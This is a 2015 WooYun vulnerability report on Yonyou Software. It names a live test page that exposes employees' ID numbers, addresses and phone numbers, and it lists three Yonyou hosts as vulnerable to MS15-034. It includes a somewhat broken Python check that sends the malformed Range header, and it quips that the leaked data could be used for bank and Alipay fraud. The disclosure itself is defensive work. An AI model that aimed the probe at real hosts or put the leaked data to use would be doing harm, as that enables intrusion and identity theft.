当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153578

漏洞标题:用友软件某系统大量敏感信息泄漏(姓名/性别/民族/住址/身份证号/邮箱/电话/手机号等)

相关厂商:用友软件

漏洞作者: 岛云首席鉴黄师

提交时间:2015-11-11 20:49

修复时间:2015-11-24 17:42

公开时间:2015-11-24 17:42

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

具体泄漏信息:姓名/性别/生日/办公电话/民族/住址/身份证号/邮箱/私人电话/手机号,可以去办个银行卡以及找回支付宝密码了……

详细说明:

http://li.yonyou.com/test.aspx


具体泄漏信息:姓名/性别/生日/办公电话/民族/住址/身份证号/邮箱/私人电话/手机号

1.png


另外还有几个MS15-034 HTTP.sys 远程代码执行漏洞:

http://h.yonyou.com/
http://hr.yonyou.com/
http://q.yonyou.com/


检测POC:

#!/usr/bin/env python
__author__ = ';jastra';
class bg_colors:
VULN = ';33[92m';
NONVULN= ';33[95m';
EXPLOIT = ';33[91m';
try:
import requests
import re
except ImportError as ierr:
print(bg_colors.EXPLOIT + "Error, looks like you don';t have %s installed", ierr)

def identify_iis(domain):
req = requests.get(str(domain))
remote_server = req.headers[';server';]

if "Microsoft-IIS" in remote_server:
print(bg_colors.VULN + "[+] 服务是 " + remote_server)
ms15_034_test(str(domain))
else:
print(bg_colors.NONVULN + "[-] 不是IIS\n可能是: " + remote_server)

def ms15_034_test(domain):
print(" 启动vuln检查!")
vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
req = requests.get(str(domain), params=vuln_buffer)
if req.headers[';content';] == "请求范围不符合":
print(bg_colors.EXPLOIT + "[+] 存在漏洞")
else:
print(bg_colors.EXPLOIT + "[-] IIS服务无法显示漏洞是否存在. "+
"需要手动检测")
usr_domain = raw_input("输入域名扫描: ")
identify_iis(usr_domain)

漏洞证明:

如上

修复方案:

版权声明:转载请注明来源 岛云首席鉴黄师@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-24 17:42

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无